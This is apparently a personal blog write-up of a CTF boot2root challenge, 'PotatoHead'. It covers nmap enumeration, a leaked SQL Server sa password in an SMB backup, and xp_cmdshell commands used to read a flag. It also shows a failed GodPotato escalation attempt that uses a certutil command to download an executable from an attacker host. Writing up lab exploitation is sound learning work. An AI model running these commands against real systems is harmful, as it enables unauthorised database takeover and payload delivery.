Sign in Subscribe

Equinor CTF | PotatoHead

Gareth

3 min read
Equinor CTF | PotatoHead
Photo by Fili Santillán / Unsplash

So after a very long hiatus from pentesting and CTFs, I joined a team of friends and colleagues once again for the Equinor CTF. The first challenge I took on was a boot2root challenge, since I figured I might as well jump right back into the deep end.

Enumeration

Ports

I started as usual with an nmap scan of the target machine.

Nmap scan report for ip-10-128-8-167.eu-west-1.compute.internal (10.128.8.167)
Host is up (0.032s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

I had a look at the website but it didn't seem to contain anything useful. Whilst I ran a gobuster scan in the background just in case, I decided to check out the SMB shares.

I was able to find a share called 'Backup' that was not password protected and which contained an entire backup of the website that hosted on port 80.

Inside the application.json file I found some very interesting information. Especially after also noticing there was a SQL Server port open on the target.

{
  "ConnectionStrings": {
    "DefaultConnection": "Server=localhost;Database=BeachClubDb;User Id=sa;Password=RLFXT0PpAtk2IAyB1xKnuaFaqDX;TrustServerCertificate=True;"
  },
  "Logging": {
    "LogLevel": {
      "Default": "Information",
      "Microsoft.AspNetCore": "Warning"
    }
  },
  "AllowedHosts": "*"
}

SQL Server

I used these credentials to connect to the SQL Server on my MacBook using a program called DBeaver. After having a look around in the BeachClubDB database tables, I determined there was nothing of use there, so instead started trying to gain information via xp_cmdshell commands.

User Flag

The following SQL Query commands were enough to read the contents of the user flag found in C:\Users\Public\flag.txt.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

EXEC xp_cmdshell 'type C:\Users\Public\flag.txt';

This displayed the contents of the file and I was able to gain the user-level flag.

EPT{sei_sandnes_e_stabilt!}

Privilege Escalation

I spent another hour or so trying to find a way to escalate my privileges to root. I noticed through running the whoami /priv command that I had the following privileges.

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Having SeImpersonatePrivilege enabled was interesting to me, and it sent me down a rabbit-hole of trying to get a process to runAs the LocalSystem user. All attempts at this ended up being futile. The few times I was able to download an .exe file to the system, it was quickly swept up by the running anti-virus.

EXEC xp_cmdshell 'certutil -urlcache -split -f http://10.128.8.170:8000/GodPotato.exe C:\temp\gp.exe';
EXEC xp_cmdshell 'dir C:\temp\';

After a few seconds my gp.exe file would disappear. I'm convinced I was on the right path, given that the task was called 'PotatoHead' but I eventually decided I was spending too much time on this task and should try something else instead.

Summary

It was fun to get back into doing boot2root style challenges, and I was glad to get the user flag at least. I eagerly await finding out how close I was to privilege escalation with the methods I was trying. After having done this write-up I have now noticed there was an RDP port open on the server which I didn't investigate further after finding the Database credentials. Perhaps I should have tried that instead.

Either way it was good fun as always to participate in the CTF with my friends and colleagues and I'm proud of how well we did, for being just a team of 4, coming 32nd overall and 23rd in our division, out of over 100 teams.

Sign up for more like this.

Enter your email
Subscribe